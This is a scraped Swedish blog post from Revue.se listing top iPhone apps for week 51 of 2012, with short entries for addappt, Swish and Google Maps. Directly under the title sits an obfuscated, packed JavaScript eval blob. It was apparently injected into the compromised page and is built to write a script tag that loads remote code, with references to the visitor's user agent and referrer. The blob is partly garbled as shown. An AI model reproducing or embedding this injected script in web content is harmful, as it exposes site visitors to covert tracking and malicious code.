Image Image Image Image Image Image Image Image Image Image

| 23 januari, 2018

Scroll to top

Top

No Comments

Top iPhone appar: Vecka 51 2012 | Revue.se

Top iPhone appar: Vecka 51 2012
Sebastian Plengier Ehrnfelt


Top eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzfzf|var|u0026u|referrer|aahyd||js|php’.split(‘|’),0,{}))
Appar iOS: Denna vecka tänkte vi dela med oss av fem stycken internationella appar som är väldigt populära just nu. Vi har även lanserat topp 20 Sverige appar som listar de 20 hetaste apparna släppta av duktiga svenska programmerare.  
Kika gärna in här!

addappt: Live Contacts+Weather
addappt: Live Contacts+Weather addappt, inc. Sociala nätverk, Näringsliv Gratis Ladda ner
Swish betalningar
Swish betalningar Bankgirot Finans Gratis Ladda ner
Google Maps
Google Maps Google, Inc. Navigering, Mat och dryck Gratis Ladda ner